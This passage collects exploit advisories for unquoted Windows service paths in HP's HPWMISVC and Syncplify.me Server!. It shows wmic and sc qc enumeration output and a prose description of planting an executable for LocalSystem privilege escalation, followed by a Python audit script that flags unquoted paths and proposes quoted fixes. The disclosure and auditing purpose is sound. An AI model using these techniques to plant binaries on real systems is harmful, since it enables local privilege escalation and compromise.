C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """


HPWMISVC               HPWMISVC            c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe               Auto


#Service info:

C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME       : HPWMISVC
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HPWMISVC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem




#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security 
applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with 
the elevated privileges of the application.
            
# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.syncplify.me/
# Software Link: https://download.syncplify.me/SMServer_Setup.exe
# Version: 5.0.37
# Tested on: Windows 10 Pro x64 es 
# Vulnerability Type: Unquoted Service Path


# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname

DisplayName                       PathName                                                          StartMode  StartName
Syncplify.me Web/REST Server! v5  C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "SMWebRestServicev5"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SMWebRestServicev5
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Syncplify.me Web/REST Server! v5
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem


# 3. Exploit:

A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.
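
The unquoted service path entries above all rest on the same check: a binary path that contains a space and is not wrapped in quotes. The following is an added example of an audit script for saved `sc qc` output, not code from any of the advisories; it accepts the English and Spanish labels shown in these entries, rejoins values that were wrapped across lines, and returns the quoted form to write back. The function names and the QuotedDemo and ArgsDemo services are assumptions.

```python
import re

# sc.exe prints localized labels; map the English and Spanish ones to fields.
LABELS = {
    "SERVICE_NAME": "name", "NOMBRE_SERVICIO": "name",
    "BINARY_PATH_NAME": "path", "NOMBRE_RUTA_BINARIO": "path",
    "SERVICE_START_NAME": "account", "NOMBRE_INICIO_SERVICIO": "account",
}
FIELD = re.compile(r"^\s*([A-Z_]{2,})\s*:\s?(.*)$")
EXE = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def parse_sc_qc(text):
    """Split concatenated `sc qc` dumps into one dict per service."""
    services, current, last = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[SC]"):
            last = None
            continue
        m = FIELD.match(line)
        if m:
            last = LABELS.get(m.group(1))
            if last == "name":
                current = {"name": m.group(2).strip()}
                services.append(current)
                last = None
            elif last and current is not None:
                current[last] = m.group(2).strip()
        elif last and current is not None:
            # Value wrapped by the console or by copy/paste: rejoin it.
            current[last] += " " + line
    return services


def split_image_path(value):
    """Return (executable, arguments) for an unquoted binary path."""
    m = EXE.search(value)
    if m:
        return value[:m.end()], value[m.end():]
    return value, ""  # no extension recorded, e.g. ...\WsxService


def audit(services):
    """Return findings for unquoted binary paths that contain a space."""
    findings = []
    for svc in services:
        path = svc.get("path", "")
        if not path or path.startswith('"'):
            continue
        exe, args = split_image_path(path)
        if " " in exe:
            findings.append({"name": svc["name"], "fix": '"%s"%s' % (exe, args),
                             "account": svc.get("account", "unknown")})
    return findings


# DpHost and HPWMISVC are abridged from the sc qc output in the entries
# above; QuotedDemo and ArgsDemo are constructed.
SAMPLE = r"""
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DpHost
        NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\DigitalPersona\Bin\DpHostW.exe
        NOMBRE_INICIO_SERVICIO: LocalSystem

SERVICE_NAME       : HPWMISVC
        BINARY_PATH_NAME   : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME       : QuotedDemo
        BINARY_PATH_NAME   : "C:\Program Files\Demo App\demo.exe" --service

SERVICE_NAME       : ArgsDemo
        BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k demo
"""

if __name__ == "__main__":
    print(audit(parse_sc_qc(SAMPLE)))
```

The "fix" value is the quoted string to store as the service's binary path; services reported with the LocalSystem account are the ones to correct first.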